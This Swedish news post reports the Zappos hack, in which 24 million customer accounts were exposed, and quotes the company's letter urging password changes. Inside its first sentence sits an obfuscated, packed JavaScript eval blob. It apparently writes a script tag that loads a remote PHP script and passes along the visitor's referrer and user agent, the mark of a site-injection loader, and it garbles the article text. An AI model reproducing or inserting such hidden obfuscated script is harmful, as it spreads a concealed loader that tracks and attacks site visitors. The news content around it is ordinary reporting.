Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Hackarattack på Zappos – 24 miljoner personer drabbade

Hackarattack på Zappos – 24 miljoner personer drabbade
Sebastian

Amazons eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|shtbi|var|u0026u|referrer|nnfsh||js|php’.split(’|’),0,{}))
interna system och 24 miljoner kundkonton är drabbade. Hackare lyckades komma in i systemet och plocka ner personliga uppgifter som namn, e-postadresser, fysiska adresser, de sista siffrorna i kreditkortsnumren samt en massa krypterade lösenord.

Dock har inga fullständiga kreditkortsnummer plockats ner säger Zappos.

– Vi blev nyligen offer för en cyberattack från en kriminell som fick tillgång till delar av våra interna nätverk och system genom en av våra servrar i Kentucky. Vi samarbetar med brottsbekämpande myndigheter för att genomföra en grundlig utredning, skriver Zappos vd Tony Hsieh i ett brev till företagets anställda, ett brev som också publicerats på Zappos sajt.

De uppmanar alla kunder att byta sina lösenord så fort som möjligt.

Är du kund byter du lösen här: Byt lösenord

Läs mer: Idg.se